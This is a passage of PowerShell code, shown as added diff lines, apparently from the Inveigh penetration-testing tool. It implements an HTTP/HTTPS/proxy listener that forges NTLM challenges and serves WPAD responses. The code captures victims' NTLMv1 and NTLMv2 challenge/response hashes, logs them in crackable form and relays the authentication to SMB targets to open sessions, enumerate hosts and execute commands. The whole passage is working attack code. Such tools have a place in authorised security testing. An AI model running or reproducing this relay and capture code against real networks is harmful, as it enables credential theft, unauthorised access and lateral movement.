+ $DNS_hostname_bytes = [System.Text.Encoding]::Unicode.GetBytes($inveigh.DNS_computer_name)
+ $hostname_length = [System.BitConverter]::GetBytes($hostname_bytes.Length)[0,1]
+ $netBIOS_domain_length = [System.BitConverter]::GetBytes($netBIOS_domain_bytes.Length)[0,1]
+ $DNS_domain_length = [System.BitConverter]::GetBytes($DNS_domain_bytes.Length)[0,1]
+ $DNS_hostname_length = [System.BitConverter]::GetBytes($DNS_hostname_bytes.Length)[0,1]
+ $target_length = [System.BitConverter]::GetBytes($hostname_bytes.Length + $netBIOS_domain_bytes.Length + $DNS_domain_bytes.Length + $DNS_domain_bytes.Length + $DNS_hostname_bytes.Length + 36)[0,1]
+ $target_offset = [System.BitConverter]::GetBytes($netBIOS_domain_bytes.Length + 56)
+
+ $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00 +
+ $netBIOS_domain_length +
+ $netBIOS_domain_length +
+ 0x38,0x00,0x00,0x00 +
+ 0x05,0x82,0x89,0xa2 +
+ $HTTP_challenge_bytes +
+ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 +
+ $target_length +
+ $target_length +
+ $target_offset +
+ 0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f +
+ $netBIOS_domain_bytes +
+ 0x02,0x00 +
+ $netBIOS_domain_length +
+ $netBIOS_domain_bytes +
+ 0x01,0x00 +
+ $hostname_length +
+ $hostname_bytes +
+ 0x04,0x00 +
+ $DNS_domain_length +
+ $DNS_domain_bytes +
+ 0x03,0x00 +
+ $DNS_hostname_length +
+ $DNS_hostname_bytes +
+ 0x05,0x00 +
+ $DNS_domain_length +
+ $DNS_domain_bytes +
+ 0x07,0x00,0x08,0x00 +
+ $HTTP_timestamp +
+ 0x00,0x00,0x00,0x00,0x0a,0x0a
+
+ $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
+ $NTLM = 'NTLM ' + $NTLM_challenge_base64
+
+ return $NTLM
+ }
+
+ if($HTTPS_listener)
+ {
+ $HTTP_type = "HTTPS"
+ }
+ elseif($proxy_listener)
+ {
+ $HTTP_type = "Proxy"
+ }
+ else
+ {
+ $HTTP_type = "HTTP"
+ }
+
+ if($HTTPIP -ne '0.0.0.0')
+ {
+ $HTTPIP = [System.Net.IPAddress]::Parse($HTTPIP)
+ $HTTP_endpoint = New-Object System.Net.IPEndPoint($HTTPIP,$HTTPPort)
+ }
+ else
+ {
+ $HTTP_endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::any,$HTTPPort)
+ }
+
+ $HTTP_running = $true
+ $HTTP_listener = New-Object System.Net.Sockets.TcpListener $HTTP_endpoint
+ $HTTP_client_close = $true
+ $process_ID_bytes = Get-ProcessIDArray
+ $relay_step = 0
+
+ if($proxy_listener)
+ {
+ $HTTP_linger = New-Object System.Net.Sockets.LingerOption($true,0)
+ $HTTP_listener.Server.LingerState = $HTTP_linger
+ }
+
+ try
+ {
+ $HTTP_listener.Start()
+ }
+ catch
+ {
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Error starting $HTTP_type listener")
+ $HTTP_running = $false
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("[-] [$(Get-Date -format s)] Error starting $HTTP_type listener")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("[-] [$(Get-Date -format s)] Error starting $HTTP_type listener")
+ }
+
+ }
+
+ :HTTP_listener_loop while($inveigh.relay_running -and $HTTP_running)
+ {
+ $TCP_request = $null
+ $TCP_request_bytes = New-Object System.Byte[] 4096
+ $HTTP_send = $true
+ $HTTP_header_content_type = [System.Text.Encoding]::UTF8.GetBytes("Content-Type: text/html")
+ $HTTP_header_cache_control = $null
+ $HTTP_header_authenticate = $null
+ $HTTP_header_authenticate_data = $null
+ $HTTP_message = ''
+ $HTTP_header_authorization = ''
+ $HTTP_header_host = $null
+ $HTTP_header_user_agent = $null
+ $HTTP_request_raw_URL = $null
+ $NTLM = "NTLM"
+
+ while(!$HTTP_listener.Pending() -and !$HTTP_client.Connected)
+ {
+ Start-Sleep -m 10
+ if(!$inveigh.relay_running)
+ {
+ break HTTP_listener_loop
+ }
+
+ }
+
+ if($relay_step -gt 0)
+ {
+ $relay_reset++
+
+ if($relay_reset -gt 2)
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay attack resetting") > $null
+ $relay_step = 0
+ }
+
+ }
+ else
+ {
+ $relay_reset = 0
+ }
+
+ if($HTTPS_listener)
+ {
+
+ if(!$HTTP_client.Connected -and $inveigh.relay_running)
+ {
+ $HTTP_client = $HTTP_listener.AcceptTcpClient()
+ $HTTP_clear_stream = $HTTP_client.GetStream()
+ $HTTP_stream = New-Object System.Net.Security.SslStream($HTTP_clear_stream,$false)
+ $SSL_cert = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Subject -match $inveigh.certificate_CN})
+ $HTTP_stream.AuthenticateAsServer($SSL_cert,$false,[System.Security.Authentication.SslProtocols]::Default,$false)
+ }
+
+ [byte[]]$SSL_request_bytes = $null
+
+ do
+ {
+ $HTTP_request_byte_count = $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length)
+ $SSL_request_bytes += $TCP_request_bytes[0..($HTTP_request_byte_count - 1)]
+ } while ($HTTP_clear_stream.DataAvailable)
+
+ $TCP_request = [System.BitConverter]::ToString($SSL_request_bytes)
+ }
+ else
+ {
+
+ if(!$HTTP_client.Connected -or $HTTP_client_close -and $inveigh.relay_running)
+ {
+ $HTTP_client = $HTTP_listener.AcceptTcpClient()
+ $HTTP_stream = $HTTP_client.GetStream()
+ }
+
+ if($HTTP_stream.DataAvailable)
+ {
+ $HTTP_data_available = $true
+ }
+ else
+ {
+ $HTTP_data_available = $false
+ }
+
+ while($HTTP_stream.DataAvailable)
+ {
+ $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length) > $null
+ }
+
+ $TCP_request = [System.BitConverter]::ToString($TCP_request_bytes)
+ }
+
+ if($TCP_request -like "47-45-54-20*" -or $TCP_request -like "48-45-41-44-20*" -or $TCP_request -like "4f-50-54-49-4f-4e-53-20*" -or $TCP_request -like "43-4f-4e-4e-45-43-54*")
+ {
+ $HTTP_raw_URL = $TCP_request.Substring($TCP_request.IndexOf("-20-") + 4,$TCP_request.Substring($TCP_request.IndexOf("-20-") + 1).IndexOf("-20-") - 3)
+ $HTTP_raw_URL = $HTTP_raw_URL.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $HTTP_request_raw_URL = New-Object System.String ($HTTP_raw_URL,0,$HTTP_raw_URL.Length)
+ $HTTP_source_IP = $HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString
+ $HTTP_connection_header_close = $true
+
+ if($TCP_request -like "*-48-6F-73-74-3A-20-*")
+ {
+ $HTTP_header_host_extract = $TCP_request.Substring($TCP_request.IndexOf("-48-6F-73-74-3A-20-") + 19)
+ $HTTP_header_host_extract = $HTTP_header_host_extract.Substring(0,$HTTP_header_host_extract.IndexOf("-0D-0A-"))
+ $HTTP_header_host_extract = $HTTP_header_host_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $HTTP_header_host = New-Object System.String ($HTTP_header_host_extract,0,$HTTP_header_host_extract.Length)
+ }
+
+ if($TCP_request -like "*-55-73-65-72-2D-41-67-65-6E-74-3A-20-*")
+ {
+ $HTTP_header_user_agent_extract = $TCP_request.Substring($TCP_request.IndexOf("-55-73-65-72-2D-41-67-65-6E-74-3A-20-") + 37)
+ $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Substring(0,$HTTP_header_user_agent_extract.IndexOf("-0D-0A-"))
+ $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $HTTP_header_user_agent = New-Object System.String ($HTTP_header_user_agent_extract,0,$HTTP_header_user_agent_extract.Length)
+ }
+
+ if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle)
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP") > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP") > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent") > $null
+
+ if($Proxy -eq 'Y' -and $ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_}))
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP") > $null
+ }
+
+ }
+
+ if($TCP_request -like "*-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-*")
+ {
+ $HTTP_header_authorization_extract = $TCP_request.Substring($TCP_request.IndexOf("-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-") + 46)
+ $HTTP_header_authorization_extract = $HTTP_header_authorization_extract.Substring(0,$HTTP_header_authorization_extract.IndexOf("-0D-0A-"))
+ $HTTP_header_authorization_extract = $HTTP_header_authorization_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $HTTP_header_authorization = New-Object System.String ($HTTP_header_authorization_extract,0,$HTTP_header_authorization_extract.Length)
+ }
+
+ if(($HTTP_request_raw_URL -notmatch '/wpad.dat' -and $HTTPAuth -eq 'Anonymous') -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous') -or (
+ $HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -like 'NTLM*' -and $WPADAuthIgnore.Count -gt 0 -and ($WPADAuthIgnore | Where-Object {$HTTP_header_user_agent -match $_})))
+ {
+ $HTTP_response_status_code = 0x32,0x30,0x30
+ $HTTP_response_phrase = 0x4f,0x4b
+ $HTTP_client_close = $true
+ }
+ else
+ {
+
+ if($proxy_listener)
+ {
+ $HTTP_response_status_code = 0x34,0x30,0x37
+ $HTTP_header_authenticate = 0x50,0x72,0x6f,0x78,0x79,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20
+ }
+ else
+ {
+ $HTTP_response_status_code = 0x34,0x30,0x31
+ $HTTP_header_authenticate = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20
+ }
+
+ $HTTP_response_phrase = 0x55,0x6e,0x61,0x75,0x74,0x68,0x6f,0x72,0x69,0x7a,0x65,0x64
+ $HTTP_client_close = $false
+ }
+
+ if($HTTP_header_authorization.StartsWith('NTLM '))
+ {
+ $HTTP_header_authorization = $HTTP_header_authorization -replace 'NTLM ',''
+ [Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($HTTP_header_authorization)
+ $HTTP_connection_header_close = $false
+
+ if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00')
+ {
+
+ if($inveigh.SMB_relay -and $relay_step -eq 0)
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type to SMB relay initiated by $HTTP_source_IP") > $null
+ $SMB_connect = Invoke-SMBConnect $process_ID_bytes $HTTP_source_IP
+ $target = $SMB_connect[1]
+ $SMB_client = $SMB_connect[0]
+ $HTTP_client_close = $false
+
+ if(!$target)
+ {
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Eligible target not found") > $null
+ $relay_step = 0
+ }
+ elseif(!$SMB_client.connected)
+ {
+
+ for($i = 0;$i -lt $inveigh.enumerate.Count;$i++)
+ {
+
+ if($inveigh.enumerate[$i].IP -eq $target -and !$inveigh.enumerate[$i]."Signing")
+ {
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Relay target $target is not responding") > $null
+ break
+ }
+
+ }
+
+ $relay_step = 0
+ }
+ else
+ {
+ $relay_step = 1
+ }
+
+ if($relay_step -eq 1)
+ {
+ $SMB_relay_bytes = Invoke-SMBRelayChallenge $SMB_client $HTTP_request_bytes $SMB_version $process_ID_bytes
+
+ if($SMB_relay_bytes.Length -le 3)
+ {
+ $relay_step = 0
+ $HTTP_client_close = $true
+ $NTLM = Get-NTLMChallengeBase64 $Challenge $HTTP_source_IP $HTTP_client.Client.RemoteEndpoint.Port
+ }
+
+ }
+
+ if($relay_step -eq 1)
+ {
+ $SMB_user_ID = $SMB_relay_bytes[34..33]
+ $SMB_relay_NTLMSSP = [System.BitConverter]::ToString($SMB_relay_bytes)
+ $SMB_relay_NTLMSSP = $SMB_relay_NTLMSSP -replace "-",""
+ $SMB_relay_NTLMSSP_index = $SMB_relay_NTLMSSP.IndexOf("4E544C4D53535000")
+ $SMB_relay_NTLMSSP_bytes_index = $SMB_relay_NTLMSSP_index / 2
+ $SMB_domain_length = Get-UInt16DataLength ($SMB_relay_NTLMSSP_bytes_index + 12) $SMB_relay_bytes
+ $SMB_domain_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 12)..($SMB_relay_NTLMSSP_bytes_index + 19)]
+ $SMB_target_length = Get-UInt16DataLength ($SMB_relay_NTLMSSP_bytes_index + 40) $SMB_relay_bytes
+ $SMB_target_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 40)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length)]
+ $SMB_relay_target_flag = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 22)]
+ $SMB_relay_NTLM_challenge = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 24)..($SMB_relay_NTLMSSP_bytes_index + 31)]
+ $SMB_relay_target_details = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 56 + $SMB_domain_length)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length + $SMB_target_length)]
+ $session_ID = $SMB_relay_bytes[44..51]
+
+ $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00 +
+ $SMB_domain_length_offset_bytes +
+ 0x05,0x82 +
+ $SMB_relay_target_flag +
+ 0xa2 +
+ $SMB_relay_NTLM_challenge +
+ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 +
+ $SMB_target_length_offset_bytes +
+ $SMB_relay_target_details
+
+ $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
+ $NTLM = 'NTLM ' + $NTLM_challenge_base64
+ $NTLM_challenge = Get-SMBNTLMChallenge $SMB_relay_bytes
+ $inveigh.HTTP_challenge_queue.Add($HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + ',' + $NTLM_challenge) > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Received challenge $NTLM_challenge for relay from $Target") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Providing challenge $NTLM_challenge for relay to $HTTP_source_IP") > $null
+ $relay_step = 2
+ }
+ else
+ {
+ $NTLM = Get-NTLMChallengeBase64 $Challenge $HTTP_source_IP $HTTP_client.Client.RemoteEndpoint.Port
+ }
+
+ }
+ else
+ {
+ $NTLM = Get-NTLMChallengeBase64 $Challenge $HTTP_source_IP $HTTP_client.Client.RemoteEndpoint.Port
+ }
+
+ }
+ elseif([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '03-00-00-00')
+ {
+ $HTTP_NTLM_length = Get-UInt16DataLength 20 $HTTP_request_bytes
+ $HTTP_NTLM_offset = Get-UInt32DataLength 24 $HTTP_request_bytes
+ $HTTP_NTLM_domain_length = Get-UInt16DataLength 28 $HTTP_request_bytes
+ $HTTP_NTLM_domain_offset = Get-UInt32DataLength 32 $HTTP_request_bytes
+ [String]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + '*'
+ $inveigh.HTTP_challenge_queue.Remove($NTLM_challenge)
+ $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1)
+
+ if($HTTP_NTLM_domain_length -eq 0)
+ {
+ $HTTP_NTLM_domain_string = $null
+ }
+ else
+ {
+ $HTTP_NTLM_domain_string = Convert-DataToString $HTTP_NTLM_domain_offset $HTTP_NTLM_domain_length $HTTP_request_bytes
+ }
+
+ $HTTP_NTLM_user_length = Get-UInt16DataLength 36 $HTTP_request_bytes
+ $HTTP_NTLM_user_offset = Get-UInt32DataLength 40 $HTTP_request_bytes
+
+ if($HTTP_NTLM_user_length -eq 0)
+ {
+ $HTTP_NTLM_user_string = $null
+ }
+ else
+ {
+ $HTTP_NTLM_user_string = Convert-DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes
+ }
+
+ $HTTP_username_full = $HTTP_NTLM_domain_string + "\" + $HTTP_NTLM_user_string
+ $HTTP_NTLM_host_length = Get-UInt16DataLength 44 $HTTP_request_bytes
+ $HTTP_NTLM_host_offset = Get-UInt32DataLength 48 $HTTP_request_bytes
+ $HTTP_NTLM_host_string = Convert-DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes
+
+ if($HTTP_NTLM_length -eq 24) # NTLMv1
+ {
+ $NTLM_type = "NTLMv1"
+ $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[($HTTP_NTLM_offset - 24)..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-",""
+ $NTLM_response = $NTLM_response.Insert(48,':')
+ $HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge
+
+ if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
+ {
+ $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash) > $null
+
+ if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full"))
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") > $null
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_username_full [not unique]") > $null
+ }
+
+ if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")))
+ {
+ $inveigh.NTLMv1_file_queue.Add($HTTP_NTLM_hash) > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response written to " + $inveigh.NTLMv1_out_file) > $null
+ }
+
+ if($inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")
+ {
+ $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_username_full") > $null
+ }
+
+ }
+
+ }
+ else # NTLMv2
+ {
+ $NTLM_type = "NTLMv2"
+ $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[$HTTP_NTLM_offset..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-",""
+ $NTLM_response = $NTLM_response.Insert(32,':')
+ $HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLM_response
+
+ if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
+ {
+ $inveigh.NTLMv2_list.Add($HTTP_NTLM_hash) > $null
+
+ if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full"))
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") > $null
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_username_full [not unique]") > $null
+ }
+
+ if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")))
+ {
+ $inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash) > $null
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) > $null
+ }
+
+ if($inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")
+ {
+ $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_username_full") > $null
+ }
+
+ }
+
+ }
+
+ if($HTTP_NTLM_domain_string -and $HTTP_NTLM_user_string -and $HTTP_NTLM_host_string -and $HTTP_source_IP)
+ {
+ Invoke-SessionUpdate $HTTP_NTLM_domain_string $HTTP_NTLM_user_string $HTTP_NTLM_host_string $HTTP_source_IP
+ }
+
+ $HTTP_response_status_code = 0x32,0x30,0x30
+ $HTTP_response_phrase = 0x4f,0x4b
+ $HTTP_client_close = $true
+ $NTLM_challenge = $null
+
+ if($inveigh.SMB_relay -and $relay_step -eq 2)
+ {
+
+ if(!$Username -or $Username -contains $HTTP_NTLM_user_string -or $Username -contains $HTTP_username_full)
+ {
+
+ if($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))
+ {
+
+ if($inveigh.relay_failed_login_table.$HTTP_username_full.Count -le $FailedLoginThreshold)
+ {
+
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Sending $NTLM_type response for $HTTP_username_full for relay to $Target") > $null
+ $SMB_relay_failed = Invoke-SMBRelayResponse $SMB_client $HTTP_request_bytes $SMB_version $SMB_user_ID $session_ID $process_ID_bytes
+
+ if(!$SMB_relay_failed)
+ {
+ $inveigh.session_current = $inveigh.session_count
+ $inveigh.session_message_ID_table.Add($inveigh.session_count,3)
+
+ if($Attack -contains 'Session')
+ {
+
+ if($SMB_client.Connected)
+ {
+ $inveigh.session_socket_table[$inveigh.session_count] = $SMB_client
+ $inveigh.session_table[$inveigh.session_count] = $session_ID
+ $inveigh.session_lock_table[$inveigh.session_count] = 'open'
+ $session_privilege = Invoke-SMBRelayExecute $SMB_client $SMB_version $SMB_user_ID $session_ID $process_ID_bytes $true
+ $session_object = New-Object PSObject
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Session $inveigh.session_count
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Target $SMB_client.Client.RemoteEndpoint.Address.IPaddressToString
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Initiator $HTTP_source_IP
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name User $HTTP_username_full
+
+ if($session_privilege)
+ {
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Privileged "yes"
+ }
+ else
+ {
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Privileged "no"
+ }
+
+ if($SMB_client.Connected)
+ {
+ $status = "connected"
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Status $status
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name "Established" $(Get-Date -format s)
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name "Last Activity" $(Get-Date -format s)
+ $inveigh.session += $session_object
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Session $($inveigh.session_count) added to session list") > $null
+ }
+
+ }
+
+ }
+
+ if($Attack -contains 'Enumerate' -or $Attack -contains 'Execute')
+ {
+
+ for($i = 0;$i -lt $inveigh.enumerate.Count;$i++)
+ {
+
+ if($inveigh.enumerate[$i].IP -eq $target)
+ {
+ $target_index = $i
+ break
+ }
+
+ }
+
+ $filter_date = Get-Date
+ }
+
+ if(($attack -contains 'Enumerate' -and $SMB_client.Connected) -and
+ (!$inveigh.enumerate[$target_index].Enumerate -or
+ (New-TimeSpan $inveigh.enumerate[$target_index].Enumerate $filter_date).Minutes -gt $RepeatEnumerate))
+ {
+ Invoke-SMBRelayEnum $SMB_client $SMB_user_ID $session_ID $process_ID_bytes $Enumerate $EnumerateGroup
+ }
+
+ if((($session_privilege -and $Attack -contains 'Execute' -and $Attack -contains 'Session' -and $SMB_client.Connected) -or
+ ($Attack -contains 'Execute' -and $Attack -notcontains 'Session' -and $SMB_client.Connected)) -and
+ (!$inveigh.enumerate[$target_index].Execute -or (New-TimeSpan $inveigh.enumerate[$target_index].Execute $filter_date).Minutes -gt $RepeatExecute))
+ {
+ Invoke-SMBRelayExecute $SMB_client $SMB_version $SMB_user_ID $session_ID $process_ID_bytes $false
+ $inveigh.enumerate[$target_index].Execute = $(Get-Date -format s)
+ }
+
+ if(!$SMB_client.Connected)
+ {
+ $inveigh.session[$inveigh.session_count] | Where-Object {$_.Status = "disconnected"}
+ }
+
+ $inveigh.session_count++
+ }
+
+ if($Attack -notcontains 'Session' -and !$SMB_relay_failed -and $RelayAutoDisable -eq 'Y')
+ {
+
+ if($Attack -contains 'Enumerate')
+ {
+
+ for($i = 0;$i -lt $inveigh.enumerate.Count;$i++)
+ {
+
+ if($inveigh.enumerate[$i].Enumerate)
+ {
+ $targets_enumerate_complete = @($inveigh.enumerate[$i].IP)
+ }
+
+ }
+
+ if($inveigh.target_list -and $targets_enumerated)
+ {
+ $targets_enumerate_remaining = Compare-Object -ReferenceObject $inveigh.target_list -DifferenceObject $targets_enumerate_complete -PassThru | Where-Object {$_.SideIndicator -eq "<="}
+ }
+
+ }
+
+ if($Attack -contains 'Execute')
+ {
+
+ for($i = 0;$i -lt $inveigh.enumerate.Count;$i++)
+ {
+
+ if($inveigh.enumerate[$i].Execute)
+ {
+ $targets_execute_complete = @($inveigh.execute[$i].IP)
+ }
+
+ }
+
+ if($inveigh.target_list -and $targets_enumerated)
+ {
+ $targets_execute_remaining = Compare-Object -ReferenceObject $inveigh.target_list -DifferenceObject $targets_execute_complete -PassThru | Where-Object {$_.SideIndicator -eq "<="}
+ }
+
+ }
+
+ if($Attack -notcontains 'Session' -or (!$targets_enumerate_remaining -and $Attack -contains 'Enumerate' -and $Attack -notcontains 'Execute') -or
+ (!$targets_execute_remaining -and $Attack -contains 'Execute' -and $Attack -notcontains 'Enumerate') -or
+ (!$targets_enumerate_remaining -and !$targets_execute_remaining -and $Attack -contains 'Enumerate' -and $Attack -contains 'Execute'))
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay auto disabled due to success") > $null
+ $inveigh.SMB_relay = $false
+ }
+
+ }
+
+ $relay_step = 0
+
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay stopped since $HTTP_username_full has exceeded failed login limit") > $null
+ $SMB_client.Close()
+ $relay_step = 0
+ }
+
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay stopped since $HTTP_NTLM_user_string appears to be a machine account") > $null
+ $SMB_client.Close()
+ $relay_step = 0
+ }
+
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full not on relay username list") > $null
+ $SMB_client.Close()
+ $relay_step = 0
+ }
+
+ }
+
+ if($proxy_listener)
+ {
+ $HTTP_send = $false
+ }
+
+ }
+ else
+ {
+ $HTTP_client_close = $false
+ }
+
+ }
+
+ if(!$proxy_listener -and $WPADResponse -and $HTTP_request_raw_URL -match '/wpad.dat' -and (!$ProxyIgnore -or !($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_})))
+ {
+ $HTTP_message = $WPADResponse
+ $HTTP_header_content_type = [System.Text.Encoding]::UTF8.GetBytes("Content-Type: application/x-ns-proxy-autoconfig")
+ }
+
+ $HTTP_timestamp = Get-Date -format r
+ $HTTP_timestamp = [System.Text.Encoding]::UTF8.GetBytes($HTTP_timestamp)
+ $HTTP_message_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message)
+
+ if($HTTP_request_raw_URL -notmatch '/wpad.dat' -or ($WPADAuth -like 'NTLM*' -and $HTTP_request_raw_URL -match '/wpad.dat') -and !$HTTP_client_close)
+ {
+ $HTTP_header_authenticate_data = [System.Text.Encoding]::UTF8.GetBytes($NTLM)
+ }
+
+ $packet_HTTPResponse = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_HTTPResponse.Add("HTTPResponse_ResponseVersion",[Byte[]](0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20))
+ $packet_HTTPResponse.Add("HTTPResponse_StatusCode",$HTTP_response_status_code + [Byte[]](0x20))
+ $packet_HTTPResponse.Add("HTTPResponse_ResponsePhrase",$HTTP_response_phrase + [Byte[]](0x0d,0x0a))
+
+ if($HTTP_connection_header_close)
+ {
+ $HTTP_connection_header = [System.Text.Encoding]::UTF8.GetBytes("Connection: close")
+ $packet_HTTPResponse.Add("HTTPResponse_Connection",$HTTP_connection_header + [Byte[]](0x0d,0x0a))
+ }
